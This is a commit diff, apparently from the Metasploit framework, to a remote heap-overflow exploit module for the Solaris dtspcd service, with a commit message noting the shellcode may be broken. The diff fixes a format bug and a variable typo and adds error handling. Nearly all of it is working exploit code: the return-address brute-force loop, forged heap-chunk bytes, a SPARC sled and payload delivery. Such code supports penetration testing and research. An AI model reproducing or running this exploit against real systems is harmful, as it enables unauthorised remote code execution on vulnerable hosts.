Mostly working, shellcode/encoder/nops may be busted

git-svn-id: file:///home/svn/incoming/trunk@3275 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/solaris/dtspcd/heap_noir.rb

@@ -62,7 +62,7 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
 			rbase = target['Rets'][1]
 			
 			while (rbase < target['Rets'][2]) do 
-				print_status("Trying 0x%.8x 0x%.8x" % target['Rets'][0] + tjmp, rbase)
+				print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
 				attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
 				attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
 				rbase += target['Rets'][3]
@@ -93,7 +93,7 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
 
 	def chunk_create(retloc, retadd)
 		"\x12\x12\x12\x12" +
-		[retaddr].pack('N')+
+		[retadd].pack('N')+
 		"\x23\x23\x23\x23\xff\xff\xff\xff" +
 		"\x34\x34\x34\x34\x45\x45\x45\x45" +
 		"\x56\x56\x56\x56" +
@@ -104,6 +104,7 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
 	def attack(retloc, retadd, fcode)
 		spc_connect()
 		
+		begin
 			buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode
 			buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
 			buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
@@ -113,6 +114,10 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
 
 			spc_write(spc_register("", buf), 4)
 			sock.get_once(-1)
+		rescue EOFError
+		rescue => e
+			$stderr.puts "Error: #{e.to_s} #{e.class.to_s}"
+		end
 	end